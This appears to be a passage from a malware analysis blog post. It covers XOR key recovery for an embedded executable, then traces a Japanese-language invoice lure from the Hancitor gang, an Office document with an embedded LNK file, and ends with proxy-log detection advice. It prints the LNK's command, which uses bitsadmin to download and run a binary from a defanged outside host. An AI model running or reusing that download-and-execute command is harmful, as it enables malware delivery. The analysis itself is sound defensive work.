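The idea behind such a known-plaintext attack fits in a few lines. This is our own minimal Python sketch, not how xor-kpa is implemented. For each candidate add value, it XORs the adjusted ciphertext with the known plaintext and looks for the shortest repeating keystream. We assume a longer known plaintext, TVqQAAMAAAAEAAAA, to reduce false positives. This is the base64 form of the usual MZ header start (4D 5A 90 00 03 00 00 00 04 00 00 00).

```python
from typing import Optional, Tuple

# base64 of the usual MZ header start 4D 5A 90 00 03 00 00 00 04 00 00 00
KNOWN = b"TVqQAAMAAAAEAAAA"


def recover_key(blob: bytes, known: bytes = KNOWN, max_add: int = 16) -> Optional[Tuple[int, bytes]]:
    """Try add values 0..max_add; return (add, key) for the first one whose
    keystream repeats with a period of at most half the known plaintext."""
    n = len(known)
    if len(blob) < n:
        return None
    for add in range(max_add + 1):
        stream = [((blob[i] + add) & 0xFF) ^ known[i] for i in range(n)]
        for period in range(1, n // 2 + 1):
            if all(stream[i] == stream[i % period] for i in range(n)):
                return add, bytes(stream[:period])
    return None
```

An add value of 0 corresponds to the plain XOR case found here.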

We can now decode and extract the embedded executable:





The gang behind Hancitor has been creating complex malicious documents to deliver their malware, and we constantly have to keep up our analysis techniques.

.LNK downloader and bitsadmin.exe in malicious Office document

We received a malicious Office document (529581c1418fceda983336b002297a8e) that tricks the user into clicking on an embedded LNK file, which in turn uses the Microsoft Background Intelligent Transfer Service (BITS) to download a malicious binary from the internet.

The following Word document (in Japanese) claims to be an invoice, the user must click the Word icon to generate the amount to be paid.


When using oledump.py to analyze this Word document, we get the following output:


As you can see, stream 8 contains an embedded OLE object. Using the following command, we can obtain information on what exactly this embedded OLE object is: oledump.py -s 8 -i ./document_669883.doc


The embedded object is thus an LNK file. We can then use the following command to get a hexdump of what this LNK file actually contains: oledump.py -s 8 ./document_669883.doc


When going through this hexdump we can spot the intentions of this LNK file:


Now, to make this a bit easier to read, we can use the following command: oledump.py -s 8 -d document_669883.doc

Which provides the following output:


Opening the LNK file will execute the following command:

C:\Windows\System32\cmd.exe %windir% /c explorer.exe & bitsadmin.exe /transfer /priority high hxxp://av.ka289cisce[.]org/rh72.bin %AppData%\file.exe & %AppData%\file.exe

Looking at the timestamps of the Word document, we noticed that the file was last saved on 2017-03-22 19:20:00. The first sighting of this file on VirusTotal was at 2017-03-22 23:15:59 UTC, less than 4 hours after it was last saved. This could explain why the link hosting the binary file was no longer active at the time of our analysis (12 hours after the first sighting on VirusTotal).

If you want to check whether your organisation has been impacted by a similar document, you can detect the malicious downloads by searching your proxy logs for the user agent “Microsoft BITS/*”. Multiple software packages use BITS to download updates, but they are currently still fairly limited in number. Filtering for unique destination hosts will reduce your dataset enough for you to spot the outlier(s) easily.
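As an illustration of that triage, here is a minimal Python sketch that counts BITS downloads per destination host and lists the rarest first. It assumes the proxy logs have already been parsed into (host, user_agent) pairs. The parsing itself depends on your proxy product and is left out; the helper name is hypothetical.

```python
from collections import Counter


def bits_destinations(records):
    """Count records whose User-Agent starts with 'Microsoft BITS/', per destination host."""
    hosts = Counter(host for host, ua in records if ua.startswith("Microsoft BITS/"))
    # Rare destinations are the interesting outliers, so list them first.
    return sorted(hosts.items(), key=lambda kv: (kv[1], kv[0]))
```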